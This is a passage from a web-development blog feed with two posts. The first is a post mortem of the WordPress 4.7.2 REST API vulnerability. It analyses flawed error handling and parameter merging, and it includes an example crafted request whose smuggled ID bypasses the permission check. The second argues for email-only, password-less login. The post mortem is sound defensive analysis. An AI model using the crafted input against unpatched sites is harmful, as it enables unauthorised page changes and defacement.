It's a potential bottleneck on> very large systems where threads are blocked and unable to respond to a> kthread_should_stop() for some period of time.There are already patches out there to fix this issue.> XPC is in need of threads that can block indefinitely, which is why XPC> is in the business of maintaining a pool of threads. Currently there is> no such capability (that I know of) that is provided by linux. Workqueues> can't block indefinitely.I'm not certain I understand this requirement. Do you mean block indefinitelyunless requested to stop?> And for performance reasons these threads need to be able to be created> quickly. These threads are involved in delivering messages to XPC's users> (like XPNET) and we had latency issues that led us to use kernel_thread()> directly instead of the kthread API. Additionally, XPC may need to have> hundreds of these threads active at any given time.Ugh. Can you tell me a little more about the latency issues?Is having a non-halting kthread_create enough to fix this?So you don't have to context switch several times to get thethread running?Or do you need more severe latency reductions?The more severe fix would require some significant changes to copy_processand every architecture would need to be touched to fix up copy_thread.It is possible, it is a lot of work, and the reward is far from obvious.> I think it would be great if the kthread API (or underlying implementation)> could be changed to handle these issues. 
I'd love for XPC to not have to> maintain this sort of thing itself.Currently daemonize is a serious maintenance problem.Using daemonize and kernel_thread to create kernel threads is a blockerin implementing the pid namespace because of their use of pid_t.So I am motivated to get this fixed.Eric-To unsubscribe from this list: send the line "unsubscribe linux-kernel" inthe body of a message to majordomo@vger.kernel.orgMore majordomo info at read the FAQ at | https://lkml.org/lkml/2007/4/27/394 | CC-MAIN-2015-35 | refinedweb | 631 | 62.58 |
Python regexes - findall, search, and match
This guide will cover the basics of how to use three common regex functions in Python - findall, search, and match. These three are similar, but they each have different a different purpose. This guide will not cover how to compose a regular expression so it assumes you are already somewhat familiar.
re.match
The match function is used for finding matches at the beginning of a string only.
import re re.match(r'hello', 'hello world') # <_sre.SRE_Match at 0x1070055e0>
But keep in mind this only looks for matches at the beginning of the string.
re.match(r'world', 'hello world') # None
Even if you're dealing with a multiline string and include a "^" to try to search at the beginning and use the re.MULTILINE flag, it will still only search the beginning of the string.
re.match(r'^hello', 'good morning\nhello world\nhello mom', re.MULTILINE) # None
A great use case for re.match is testing a single pattern like a phone number or zip code. It's a good way to tell if your test string matches a desired pattern. This is a quick example of testing to make sure a string matches a desired phone number format.
if re.match(r'(\d{3})-(\d{3})-(\d{4})', '925-783-3005'): print "phone number is good"
If the string matches, a match object will be returned; otherwise it will return None.
You can read more about Python match objects if necessary.
re.search
This function is very much like match except it looks throughout the entire string and returns the first match. Taking our example from above:
import re re.search(r'world', 'hello world')
<_sre.SRE_Match at 0x1070055e0>
When using match this would return None, but using search we get our match object. This function is especially useful for determining if a pattern exists in a string. For instance, you might want to see if a line contains the word sandwich.
Or maybe you want to take a block of text and find out if any of the lines begin with a number:Or maybe you want to take a block of text and find out if any of the lines begin with a number:
line = "I love to each sandwiches for lunch." if re.search(r'sandwich', line): # <_sre.SRE_Match at 0x1070055e0> print "Found a sandwich"
text = """ 1. ricochet robots 2. settlers of catan 3. acquire """ match = re.search(r'\d+.', text, re.MULTILINE) match.group()
'1.'
Again, this is very valuable for searching through an entire block of text to look for a match. If you're looking to find multiple occurrences of a pattern in a string, you should look at step 3 - findall.
re.findall
Findall does what you would expect - it finds all occurrences of a pattern in a string. This is different from the previous two functions in that it doesn't return a match object. It simply returns a list of matches. Using our board game example from above:
text = """ 1. ricochet robots 2. settlers of catan 3. acquire """ re.findall(r'\d+.', text, re.MULTILINE)
['1.', '2.', '3.']
As you can see, this returns a list of matches. If you don't use parentheses to capture any groups or if you only capture one group, the result will be a list of strings. If you capture more than one group, the result will be a list of tuples.
text = """ 1. ricochet robots 2. settlers of catan 3. acquire """ re.findall(r'^(\d+).(.*)$', text, re.MULTILINE)
[('1', ' ricochet robots'), ('2', ' settlers of catan'), ('3', ' acquire')]
In this case we're capturing the number and the name of the game in two different groups. | https://howchoo.com/g/zdvmogrlngz/python-regexes-findall-search-and-match | CC-MAIN-2019-39 | refinedweb | 621 | 74.69 |
We are about to switch to a new forum software. Until then we have removed the registration on this forum.
Hi!
I'm using arduino and a PIR sensor to detect motion. Sending 'A' when HIGH and 'B' when LOW through the serial port.
In processing I have a working sketch that will display an image when 'A' is being sent through. clears it and shows the background when 'B'. I want to take this a step further and have it display a random image from an array. I've been trying to plug and play with Shiffman's examples but no luck. Anyone have any tips??
this is the code that's working for me without random function. Sorry if it is sloppy.
import processing.serial.*; PImage bg; Serial myPort; // The serial port: boolean drawImage; int count; PImage photo; void setup() { size(385,351); bg = loadImage("yes.jpg"); // List all the available serial ports: println(Serial.list()); // Open the port you are using at the rate you want: myPort = new Serial(this, Serial.list()[8], 9600); drawImage = false; int count = 0; photo = loadImage("no1.jpg"); } void draw() { background(bg); while (myPort.available () > 0) { char inByte = myPort.readChar(); if (inByte == 'A') { drawImage = true; if (inByte == 'B') drawImage = false; } } if (drawImage) { count+=1; fill(0); image(photo, 0, 0); } if (drawImage && count > 120) { drawImage = false; count = 0; } }
Answers
You could do the follwing.
hope that you understand it, and it's what you want
Thomas | https://forum.processing.org/two/discussion/4085/how-to-display-random-image-from-serial-port-signal | CC-MAIN-2020-45 | refinedweb | 244 | 68.16 |
- Join Date: Mar 2009
- Posts: 2
[SOLVED] empty socket buffer(??) while using Netfilter.
I am new to Netfilter and kernel programming in Linux. I tried to implement a simple firewall using Netfilter after reading online tutorials on it. For some reason, I am getting an empty socket buffer (I think) when the hook function is called. I tried googling for solutions but had no luck. I am pasting a simplified version of my firewall code below. As a test bed, I used a simple client-server socket program. To check whether the problem was in the test bed, I disabled it, inserted the firewall module, and checked the socket buffer against regular internet traffic (browser, etc.), but had no luck there either.
Is my implementation wrong? I can't seem to figure out why on earth the buffer would be empty.
Am I missing something really obvious?
Digging a little deeper into packet traversal, I surmised that it is the NIC's job to create and populate the sk_buff, which is passed to the kernel through netif_rx().
I am running my code on Ubuntu 8.10. So, taking a really far-fetched (and almost certainly wrong) guess, could it have something to do with Ubuntu's driver for Broadcom cards?
My sincere apologies if I posted in the wrong forum. This is my first post.
/// Simplified firewall code.
#ifndef __FW_C
#define __FW_C
// includes
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/netfilter.h> // contains hook defs; kbuild resolves the path, no absolute header paths needed
#include <linux/netfilter_ipv4.h> // contains definitions of priorities
#include <linux/skbuff.h>
#include <linux/tcp.h>// contains definition of struct tcphdr
MODULE_LICENSE("GPL"); // avoids tainting the kernel when the module is loaded

//declarations
static struct nf_hook_ops in_pre_routing;
static struct nf_hook_ops in_local_in;
unsigned int hook_func(unsigned int hooknum,
struct sk_buff **skb,
const struct net_device *in,
const struct net_device *out,
int (*okfn)(struct sk_buff*))
{
if(!*skb)
{
// This place is reached in the code. I checked /var/log/messages
printk(KERN_INFO"\nPacket Dropped\n");
return NF_DROP;
}
else
return NF_ACCEPT;
// return(check_tcp_packet(*skb));
}
int init_module(void)
{
in_local_in.hook = hook_func; //user defined hook function
in_local_in.pf = PF_INET; //Protocol family
in_local_in.hooknum = NF_INET_LOCAL_IN; // packets addressed to this host, after routing
in_local_in.priority = NF_IP_PRI_FIRST;
nf_register_hook(&in_local_in);
return 0;
}
void cleanup_module(void)
{
// nf_unregister_hook(&in_pre_routing);
nf_unregister_hook(&in_local_in);
}
#endif
Found my mistake
I used the wrong method signature for my kernel header files. The netfilter hook prototype changed from taking a struct sk_buff ** to a plain struct sk_buff * around kernel 2.6.24, if I understand correctly, and Ubuntu 8.10 ships 2.6.27. With the old signature, my !*skb check was dereferencing the sk_buff itself as if it were a pointer-to-pointer, which is why the buffer looked empty. The correct signature of the hook function should be
unsigned int hook_func(unsigned int hooknum,
struct sk_buff *skb,
const struct net_device *in,
const struct net_device *out,
int (*okfn)(struct sk_buff*))
{
// func body of correct version
}
instead of
unsigned int hook_func(unsigned int hooknum,
struct sk_buff **skb,
const struct net_device *in,
const struct net_device *out,
int (*okfn)(struct sk_buff*))
{
//func body of old version
}
Silly me.
Thanks and apologies to all those who wasted time looking at this. | http://www.linuxforums.org/forum/kernel/142237-solved-empty-socket-buffer-while-using-netfilter.html | CC-MAIN-2018-13 | refinedweb | 475 | 50.63 |
Luke Plant’s home page - Web development

4.7.2 post mortem (2017-02-17, Luke Plant)<p class="first last">Some lessons from the recent WordPress vulnerability</p> <p>A few weeks ago, <a class="reference external" href="">WordPress released version 4.7.2</a> to address several security vulnerabilities, including <a class="reference external" href="">one critical one</a>. This vulnerability allowed a remote, unauthorised attacker to update web pages via the <span class="caps">REST</span> <span class="caps">API</span>. Since then, <a class="reference external" href="">hundreds of thousands of unpatched installations have been defaced</a>. In addition, in some cases this can lead to remote code execution, and <a class="reference external" href="">that has been seen in the wild</a>.</p> <p>The vulnerability was found by Sucuri, and <a class="reference external" href="">they have detailed the issue on their blog</a>.</p> <p>I haven’t found much by way of deeper analysis, and so this post is my take on some of the deeper coding/development process issues behind such a serious security problem. It is meant to be constructive — that is, what positive lessons can be learned for avoiding this kind of thing in our own projects.</p> <p>(Upfront note about my biases: I’m not a fan of <span class="caps">PHP</span>, though I used to be a long time ago, or WordPress, especially when it comes to security; after <span class="caps">PHP</span> I’ve worked mainly with Python, and I’m a (rather inactive) Django core developer; I’ve used various other languages, and I’m drawn to languages like Haskell and similar.)</p> <div class="section" id="summary-of-coding-error"> <h2>Summary of coding error</h2> <p>The primary error was a piece of code that failed to check a returned value to see if it was an error value. 
In particular, the code looked like the following (removing irrelevant details, as I will for all the samples in this post):</p> <div class="highlight"><pre class="code php literal-block"><span></span><span class="x">public function update_item_permissions_check( $request ) {</span> <span class="x"> $post = get_post( $request['id'] );</span> <span class="x"> if ( $post && ! $this->check_update_permission( $post ) ) {</span> <span class="x"> return new WP_Error(...);</span> <span class="x"> }</span> <span class="x"> # Various other conditions checked</span> <span class="x"> return true;</span> <span class="x">}</span> </pre></div> <p>In this case, <tt class="docutils literal">get_post</tt> could return an error value, but this was never checked for, so the permissions check ends up returning <tt class="docutils literal">true</tt>. Therefore, the permissions check was inadequate, allowing the privilege escalation — i.e. an unauthorised user could change any post by forcing the error condition in <tt class="docutils literal">get_post</tt>, which turns out to be easy to do.</p> <p>There are various other bits of code that have issues, particularly failure to properly validate the incoming post <span class="caps">ID</span>, and code which did it different ways. If any one of them had been done differently, the vulnerability might have been avoided. 
You can look at Sucuri’s posts above to see the full details, and I’ll discuss more below.</p> </div> <div class="section" id="causes-of-the-vulnerability"> <h2>Causes of the vulnerability</h2> <p>Now I’ll come to a list of issues that I think were, or might have been, behind this vulnerability.</p> <p>I’m aware that some of these may annoy you if your framework/language of choice is implicated as inferior — but if you react by dismissing that point, and saying it was all the <strong>others</strong> that are to blame, you’ve missed the whole point of doing a post mortem on someone else’s misfortune.</p> <ol class="arabic"> <li><p class="first">Dynamic typing/null values.</p> <p>The <tt class="docutils literal">get_post</tt> method was able to return a null value, instead of an object, without forcing that value to be checked. This is a flaw in all dynamically typed languages, and many statically typed ones. In statically typed languages that do not allow null values (e.g. Haskell, Rust in normal code), you’d be forced to choose an explicit error handling mechanism that would be much less prone to this kind of issue.</p> <p>There are multiple other ways that these kinds of statically typed languages would have prevented an invalid string from being passed through multiple levels of code — the design of such languages generally forces you to sanitise earlier, eliminating the confusion that caused this bug.</p> </li> <li><p class="first"><span class="caps">PHP</span> flaw — very poor error handling mechanisms.</p> <p>Builtin <span class="caps">PHP</span> functions, and therefore any <span class="caps">PHP</span> project, have a whole range of error handling mechanisms — errors, warnings, returning error values, and exceptions. At every point, calling code needs to know which system will be used to handle errors. 
The calling code in <tt class="docutils literal">update_item_permissions_check</tt> above would have been fine if <tt class="docutils literal">get_post</tt> had thrown an exception for an invalid post, but it didn’t. To review the code, you need to know the implementation and conventions of the code that is being called, which is seriously impeded by having multiple options.</p> </li> <li><p class="first">Poor choice of error handling.</p> <p>While <span class="caps">PHP</span> has flawed error handling (as above), it is still possible to do your best. Since <span class="caps">PHP</span> has no method to ensure that calling code checks for returned errors, using returned error values (whether null values, like <tt class="docutils literal">null</tt>, <tt class="docutils literal">false</tt> etc., or custom error objects) is one of the worst kinds of error handling mechanisms in <span class="caps">PHP</span>, and WordPress made the mistake of using it.</p> <p>In fact, doing it correctly in WordPress is harder, in that they use not only builtin false-y values to indicate errors, but they also have a custom error class <tt class="docutils literal">WP_Error</tt>, which is not false-y (and probably can’t be false-y due to <span class="caps">PHP</span> limitations), so that properly checking for a null/error condition is either very verbose, or requires you to remember which convention is used. (e.g. <tt class="docutils literal">get_post</tt> returns <tt class="docutils literal">null</tt> for error conditions, but <tt class="docutils literal"><span class="pre">WP_REST_Posts_Controller::get_post</span></tt> returns <tt class="docutils literal">WP_Error</tt>).</p> <p>This contrasts with languages like Go, for example. Go returns a tuple from every function that can fail, and if you assign the error value but never use it, compilation fails, so it is much, much harder to get this wrong. 
Plus, the language design means that basically all Go code will work the same, so you know what correct looks like.</p> <p>It also contrasts with conventions in Python and frameworks like <a class="reference external" href="">Django</a>, which will typically raise exceptions in situations like this: <tt class="docutils literal"><span class="pre">Post.objects.get(id='invalidid')</span></tt> will raise <tt class="docutils literal">Post.DoesNotExist</tt>, rather than return <tt class="docutils literal">None</tt> etc.</p> </li> <li><p class="first">Very poor framework design decision — merging of parameters from <span class="caps">URL</span> path component and query string parameters.</p> <p>The WordPress code for the <span class="caps">REST</span> <span class="caps">API</span> has some routing methodology that allows parameters to be defined in the paths of URLs e.g.:</p> <pre class="literal-block"> "/(?P<id>[\d]+)" </pre> <p>This regex matches part of the path component in a <span class="caps">URL</span>, and the name <tt class="docutils literal">id</tt> is used as a key in a dictionary of parameters passed to the handling function. (This is pretty much exactly like Django <span class="caps">URL</span> routing). These matched parameters are available in the request object passed to the functions above.</p>
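<p>The effect of this kind of merge can be sketched in a few lines of Python (the names here are hypothetical; this imitates the WordPress-style merge, not any real framework’s <span class="caps">API</span>):</p>

```python
import re

# Route regex: the path component can only ever capture numeric IDs.
URL_RE = re.compile(r"/(?P<id>\d+)$")

def merged_params(path, query_params):
    # WordPress-style merge: start from the validated URL-path captures,
    # then let unvalidated query-string values overwrite them.
    params = dict(URL_RE.search(path).groupdict())
    params.update(query_params)
    return params

# The route itself can only ever produce a numeric id...
print(merged_params("/123", {}))
# ...but a query-string parameter silently replaces the validated value:
print(merged_params("/123", {"id": "123somethingelse"}))
```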
This means that it is possible to pass an <tt class="docutils literal">id</tt> value that doesn’t match the regex:</p> <pre class="literal-block"> /123/?id=123somethingelse </pre> <p>…and it is <tt class="docutils literal">123somethingelse</tt>, not <tt class="docutils literal">123</tt> that will be returned by <tt class="docutils literal"><span class="pre">request['id']</span></tt> shown in the pseudo-code above. While there are more specific methods available for getting <span class="caps">URL</span> path or query string parameters, the dictionary/array access shown is the most convenient (and therefore most encouraged) way to get data out of it.</p> <p>This feature seems to be inspired by <span class="caps">PHP</span>’s <tt class="docutils literal">$_REQUEST</tt>, but is worse, because <tt class="docutils literal">$_REQUEST</tt> is no more convenient than <tt class="docutils literal">$_POST</tt> or <tt class="docutils literal">$_GET</tt>, and in fact requires more characters to type. Here, however, not only is the merged dictionary more convenient to access than the un-merged ones, it also includes <span class="caps">URL</span> path components to confuse things even more.</p> <p>This meant that the checking of the format of the <span class="caps">ID</span> parameter that appeared to take place in the routing code (via a regex that limited to numeric IDs) was ineffective.</p> <p>Lesson: Merging data from multiple distinct sources into a single bag with the same namespace is very often a bad idea. 
In particular, if the different sources are not subject to the same validation rules, or correct usage might rely on users knowing which source has precedence, you are asking for trouble.</p> <p>Historic Django note: long ago before 1.0 Django had a very similar feature — dictionary access on the request object did a merge of <tt class="docutils literal">request.<span class="caps">GET</span></tt> and <tt class="docutils literal">request.<span class="caps">POST</span></tt> parameters. It was realised this was a bad idea, and for the 1.0 release this was replaced with a more explicit and discouraged <tt class="docutils literal">request.<span class="caps">REQUEST</span></tt> object. This too was eventually <a class="reference external" href="">deprecated in 1.7</a> and later removed. I heard <a class="reference external" href="">some protests</a> about this, but I’m glad it’s gone — it is too much of a liability to justify its very occasional usefulness.</p> <p>(Update — just hours after writing this post, while reviewing deprecation warnings for a Django 1.8 project I maintain, a usage of <tt class="docutils literal">request.<span class="caps">REQUEST</span></tt> was flagged and — surprise, surprise — it harboured a security vulnerability).</p> </li> <li><p class="first">Multiple calls to retrieve the same thing from the database.</p> <p>You might think that since <tt class="docutils literal">get_post</tt> returns a null object (of some kind), then there won’t be a post object to update, and therefore no vulnerability. 
However, it turns out that <tt class="docutils literal">get_post</tt> is called in multiple places within the handler — once to check permissions, and again to actually do the update, something like this:</p> <pre class="literal-block"> public function update_item( $request ) { $id = (int)request['id']; $post = get_post( $id ); # Some checks and processing...then: wp_update_post( $post, $some_other_data ); } </pre> <p>When this code is run, the permission checks should have already been run (in a separate code path). This is a performance bug in itself — it is doing multiple <span class="caps">DB</span> queries (assuming no caching) to get the same thing.</p> <p>There is a bigger problem, which is that it is possible for the different callees to call <tt class="docutils literal">get_post</tt> with different data, and as it turns out they do. The difference allowed the attack to proceed — the code checking for permission to edit the object did not find an object to edit, but the code doing the editing did. This is a flawed permission checking <span class="caps">API</span>.</p> <p>Lesson: if your permission checking code is separate from the main path that retrieves the data, it might be doing something critically different.</p> <p>Lesson: if you are loading the same data from the database multiple times, this is a code smell that you’ve got duplication that might be harbouring mistakes.</p> </li> <li><p class="first">Multiple attempts at sanitising.</p> <p>Sanitising is good, but it should be done in the right place. In <tt class="docutils literal">update_item</tt> above, when it called <tt class="docutils literal">get_post</tt> it made a half-hearted attempt to sanitise the post <span class="caps">ID</span> value it passed in, by converting to an integer. 
This made it different from the other call to <tt class="docutils literal">get_post</tt>, with the result described above — this code was able to retrieve a post object to update, while the permissions checking code was not.</p> <p>The problem is that just sanitising what you pass to a call doesn’t sanitise where you got it from, or sanitise other people’s usage of it which might have happened earlier. Sanitising is in the wrong place if it does not make it harder for any other code to get the unsanitised data.</p> <p>Lesson: If you’re sanitising data all over the place, it’s a sign you don’t actually know how to clean input data up, and you could in fact be making things worse.</p> </li> <li><p class="first"><span class="caps">PHP</span> weak typing flaw — ‘casting’ (as it is called in <span class="caps">PHP</span>) doesn’t raise errors for invalid values, and in fact sometimes just ignores bad data.</p> <p>Namely, in <span class="caps">PHP</span>:</p> <pre class="literal-block"> (int)"123abc" === 123 </pre> <p>However:</p> <pre class="literal-block"> is_numeric("123abc") === false </pre> <p>So, in <tt class="docutils literal">update_item</tt> above, ‘casting’ to an int just ignores the data that couldn’t be converted. If <span class="caps">PHP</span> had done something more strict (e.g. raise an error, or even return null), this vulnerability would not have happened. In fact, if these two methods had simply agreed with each other, the vulnerability would not have happened either. 
The difference between them meant that one bit of code thought “There isn’t a valid <span class="caps">ID</span> that I could even use to do a <span class="caps">DB</span> lookup”, and another was able to find a post just fine, by ignoring the data that didn’t look like a number.</p> </li> <li><p class="first">A permissions framework that defaults to “allow”.</p> <p>The permission method responsible for the failure basically works like this:</p> <pre class="literal-block"> if error_condition_1: return Error(...) if missing_permission_1: return Error(...) if missing_permission_2: return Error(...) return True </pre> <p>It’s basically impossible to look at the code and guess whether they missed anything (in this case, checking for an error code in one of the called functions was missing). A lot of permission checking code looks like this, or has the same “default to allow” construction. For example, in Django code, views are all public by default, and you have to remember to add a decorator to limit access.</p> <p>Many database applications also work the same way — often any code in the application can access and update any record of any table, and you have to specifically remember every single limitation you want to apply if you don’t want the “allow all” behaviour. Fixing this can be hard, requiring big changes in architecture.</p> <p>One way to do it is to have allowed functionality encapsulated into some kind of code object, that is only returned when correct credentials are passed. Or, permissions check methods should return some credential object that must then be passed to every model layer function that wants to take some action.</p> <p>At the very least, rather than the <span class="caps">REST</span> interface and the normal admin interface doing the same checks, the model layer should do this. 
This results in less code surface area to attack.</p> </li> <li><p class="first">A “don’t let it crash” mentality.</p> <p>The design of <span class="caps">PHP</span> has this mentality — most builtin functionality will just try to continue and return <strong>something</strong> rather raise an error that might terminate execution of the program. This is due to its history as a template language. Unfortunately, while this might sometimes be a reasonable design choice for templating (though that is highly debatable), it is always a terrible choice for a general purpose language. It is better to crash than to do the wrong thing.</p> <p>The same mentality can be seen in some of the code involved in this vulnerability.</p> <p>For example, <tt class="docutils literal">update_item</tt> has:</p> <pre class="literal-block"> public function update_item( $request ) { $id = (int) $request['id']; $post = get_post( $id ); </pre> <p>Converting to integer presumably is designed to makes sure that <tt class="docutils literal">get_post</tt> doesn’t crash — we will at least be passing it something of the right form. It is a misguided and misimplemented form of defensive programming. If it had been omitted, the vulnerability would have been avoided.</p> <p>In <tt class="docutils literal">update_item_permissions_check</tt>, we have this code:</p> <pre class="literal-block"> public function update_item_permissions_check( $request ) { $post = get_post( $request['id'] ); if ( $post && ! $this->check_update_permission( $post ) ) { ... </pre> <p>The code checks that <tt class="docutils literal">$post</tt> is not <tt class="docutils literal">null</tt> or false-y before attempting to call a method on it. This is again defensive programming, and seems reasonable, but in fact is only designed to make sure the code the doesn’t crash <em>here</em> — “I must remember not to call a function that might crash with <tt class="docutils literal">null</tt> parameters”. 
However, the big problem is that the code doesn’t actually deal with the possibility that <tt class="docutils literal">$post == null</tt>. If instead the code had avoided the <tt class="docutils literal">null</tt> check, then for the exploit scenario <tt class="docutils literal">check_update_permission</tt> would simply have caused a crash — which would have been harmless (you just get a 500 error, which is an error for that user, but doesn’t affect anyone else).</p> <p>In fact the 4.7.2 code still has the same structure, but now looks like this:</p> <pre class="literal-block"> $post = $this->get_post( $request['id'] ); if ( is_wp_error( $post ) ) { return $post; } if ( $post && ! $this->check_update_permission( $post ) ) { ... </pre> <p>The last line here makes no sense now — unlike the global function <tt class="docutils literal">get_post</tt>, <tt class="docutils literal"><span class="pre">$this->get_post</span></tt> never returns a false-y value, it returns either a <tt class="docutils literal">WP_Post</tt> or a <tt class="docutils literal">WP_Error</tt>. The rest of the codebase is littered with this kind of thing, and in many cases it is the right thing (at least locally). This pattern can easily become a habit, and so it becomes hard to spot that here it is a vulnerability (4.7.1 code), or makes no sense (4.7.2).</p> <p>Lesson: the aim should be that your program does the <strong>right</strong> thing, and if it can’t do that, it should do <strong>nothing</strong>. The worst thing you can do is have a philosophy of “whatever happens, the program should not crash in the line of code I’m currently writing”.</p> </li> <li><p class="first">Code-base compatibility constraints.</p> <p>Looking through the code, it becomes clear that there are multiple different ways to do everything.</p> <p>The <span class="caps">REST</span> <span class="caps">API</span> uses code that is Ruby-on-Rails-ish — controller classes with request objects being passed in to methods. 
This feels modern-ish (despite various design flaws I’ve mentioned and being very verbose) — anyone using a recent web framework would understand roughly how it works. Most of the rest of the code base uses the classic “Spaghetti <span class="caps">PHP</span> files” anti-pattern — a chain of includes that you have to follow to work out where things are actually done, request handling code executing at the top level rather than just function and class definitions.</p> <p>As noted above, some functions use false-y values to indicate errors, others use <tt class="docutils literal">WP_Error</tt> (e.g. <tt class="docutils literal"><span class="pre">WP_REST_Posts_Controller::get_post</span></tt>). You’ve just got to remember which is which to get it right. In fact, of the first variety, some code uses <tt class="docutils literal">false</tt> (e.g. <tt class="docutils literal"><span class="pre">WP_Post::get_instance</span></tt>), while some use <tt class="docutils literal">null</tt> (e.g. global <tt class="docutils literal">get_post</tt>), which is the kind of inconsistency that is asking for trouble.</p> <p>Why hasn’t any of this been cleaned up? My guess is backwards-compatibility. WordPress’s crown jewel is its installation base, which is huge. Fixing their code to be more consistent and secure would involve breaking tons of plugins, so they are not going to do that. Their only option is to try to write new code using better patterns, but this is itself a problem — the classic <a class="reference external" href="">Lava flow anti-pattern</a>.</p> <p>Sometimes people complain about the rate at which Django <a class="reference external" href="">deprecates</a> things, but I’ve already given one example above of why it is very important that we do so. 
Django has a pretty good track record on security only because we are willing to sometimes break things at the <strong><span class="caps">API</span></strong> level, rather than just leave sharp edges everywhere and tell people not to cut themselves.</p> </li> <li><p class="first">Volume of code. The more verbose your code, the easier it will be for code reviews to miss things like this — both specific errors, and poor internal <span class="caps">API</span> design.</p> <p>Look at the WordPress code, and you will find there is <strong>tons</strong> of it. It is extremely verbose — it’s like you are reading code designed to mimic the bad points of Java with none of its good points. Every class is so big it needs its own file, despite having extremely little meat in it.</p> <p>WordPress is currently about 500,000 <span class="caps">LOC</span> (<span class="caps">PHP</span>+<span class="caps">JS</span>+<span class="caps">CSS</span>, including comments, not including docs, tests and bundled themes, and not including other text that does not need to be maintained — I tried to come up with some criteria that would be roughly fair to several projects, knowing that they are different in nature).</p> <p>Compare this (with the caveats already mentioned, and using similar criteria for counting) to:</p> <ul class="simple"> <li>the web framework framework Django — about 135,000</li> <li>the Django based <span class="caps">CMS</span> Mezzanine — 43,000</li> <li>the Django based <span class="caps">CMS</span> WagTail — 57,000</li> <li>the Django based <span class="caps">CMS</span> django-fiber — 18,000</li> </ul> <p>Or, within a <span class="caps">CMS</span>, compare the <a class="reference external" href=""><span class="caps">REST</span> backend in WordPress</a> which is about 9,000 <span class="caps">LOC</span> (not including an additional 3,000 in the base classes and other supporting code), with the <a class="reference external" href=""><span class="caps">REST</span> backend in 
django-fiber</a> — about 300 <span class="caps">LOC</span> (it uses <a class="reference external" href="">django-rest-framework</a> to do the heavy lifting).</p> <p>If we decide that’s not fair, we could also compare to <a class="reference external" href="">WagTail’s <span class="caps">REST</span> <span class="caps">API</span></a> which doesn’t use a framework (other than Django), and therefore includes its own router and serialization classes, and still only weighs in at 1,400 <span class="caps">LOC</span> — about one tenth the size of the equivalent code in WordPress.</p> <p>Yes, django-fiber uses django-rest-framework, and all the above use Django and other projects, but those other projects provide re-usable code, code that has many features unused by the above <span class="caps">CMS</span>’s, and code that is therefore very generic. WordPress code on the other hand, despite its ‘framework’ code being written for internal use, and not really being usable outside WordPress, manages to be many times more verbose. You could put Django, django-rest-framework (15k), Mezzanine, Wagtail, django-fiber, Pillow (image library used by many Python CMSs, 22k), django-mptt and django-treebeard (Django database tree libraries used by these CMSes, 4k and 6k), django-compressor (build tool used by several, 5k) all together and still be nowhere near matching WordPress for <span class="caps">LOC</span>.</p> <p>How does WordPress manage to be so big? Yes, WordPress code contains more comments, but that’s still code you have to scroll past, or read to understand. Whatever the reason, one of the consequences is that when reviewing code, you are just going to fall asleep that much sooner. 
I couldn’t find much by way of detailed review for the <a class="reference external" href="">ticket that introduced the WordPress <span class="caps">REST</span> infrastructure</a> given it is such a big patch (but I might be looking in the wrong places).</p> <p>I suspect that the verbosity of WordPress is likely triggered by the poor quality of language features and/or poor internal design.</p> <p>The linked Python code is generally much more compact, and this is probably mainly due to the design of Python, especially things like first-class classes and decorators. In some cases, there are definitions of <span class="caps">REST</span> <span class="caps">API</span> endpoints that have no methods defined in them at all. Declarative code was sufficient in many cases, and the code is easy to read and very free of noise.</p> </li> <li><p class="first">Not learning from other systems and frameworks.</p> <p>I’ve highlighted a few places in the design of WordPress’s <span class="caps">REST</span> infrastructure that look like very poor design decisions (e.g. merging of parameters from different sources). These things are known to be poor design decisions in other parts of the web development world (e.g. Django removed or discouraged them years ago), yet experienced <span class="caps">PHP</span> developers didn’t see them when it came to code review time. 
This could have been because they fell asleep due to the volume, but I’d tentatively suggest that another factor might have been a narrow experience of the world, and one particularly dominated by the norms of the <span class="caps">PHP</span> world, where the whole language and framework design normalises poor design decisions.</p> <p>This may be unfair — a lot of the new code for the <span class="caps">REST</span> <span class="caps">API</span> looks like it is inspired by other frameworks, which presumably means the developers have had some exposure to other systems.</p> <p>But either way — the lesson is that a failure to learn from other programming sub-cultures and other languages means we might be walking into traps that we could easily avoid. For myself, I think that in the Python community there can be a snobbishness about other languages (e.g. the way I look down on <span class="caps">PHP</span>) that can lead to a complacent lack of knowledge of other languages and systems that are way ahead in some areas.</p> </li> </ol> <p>Well, that’s all. Hopefully there is something we can learn from this nasty vulnerability!</p> </div>

A simple password-less, email-only login system (2016-07-17, Luke Plant)<p class="first last">A simple password-less login system to consider for some use cases, with Django code.</p> <div class="section" id="outline"> <h2>Outline</h2> <p>The authentication system is simply this:</p> <ol class="arabic simple"> <li>To log in, the user enters their email address into the login form.</li> <li>The site emails them a unique link containing a login token.</li> <li>Clicking the link logs them in.</li> </ol> <p>This is <a class="reference external" href="">not a new idea</a>, although I don’t think I was conscious of other implementations when I created mine. 
In this post I’m presenting my rationale for it, listing some advantages that I haven’t seen elsewhere, and other implementation pointers.</p> </div> <div class="section" id="rationale"> <h2>Rationale</h2> <ol class="arabic"> <li><p class="first">…</p> <p>With this system, email verification and login are combined.</p> </li> <li><p class="first">…</p> </li> <li><p class="first">For the site implementation, not having a password to store is even better — there is no way you can mess up password hashing and storage, no possibility of a password database being stolen, because you simply do not have passwords.</p> </li> <li><p class="first">Not having a password to enter the first time reduces friction for most users.</p> </li> <li><p class="first">Users faced with yet another password will typically do one of the following:</p> <ol class="arabic simple"> <li>choose weak passwords that they can remember easily, which is bad for security,</li> <li>re-use a password so they can remember it easily, again bad for security, or,</li> <li>forget their password.</li> </ol> <p>However, with a password reset, the process is much, much worse:</p> <ol class="arabic simple"> <li>First they have to remember if they signed up for the site in the past, to work out if they should “log in” or “create account”.</li> <li>Then they have to make several attempts at remembering their password.</li> <li>Then they’ve got to use the password reset feature (hopefully it isn’t hidden, but I’ve seen users struggle with this when literally the only things on the page were the login form and a “Forgotten your password?” link).</li> <li>They then have to check their email and click the link.</li> <li>Now they have to negotiate a new password form, possibly including a strength monitor that won’t allow them to choose a weak password.</li> <li>…</li> </ol> <p>By removing the password entirely, most of these steps are eliminated. Steps 1, 2 and 3 are replaced by a single method for logging in — “Enter your email address”. 
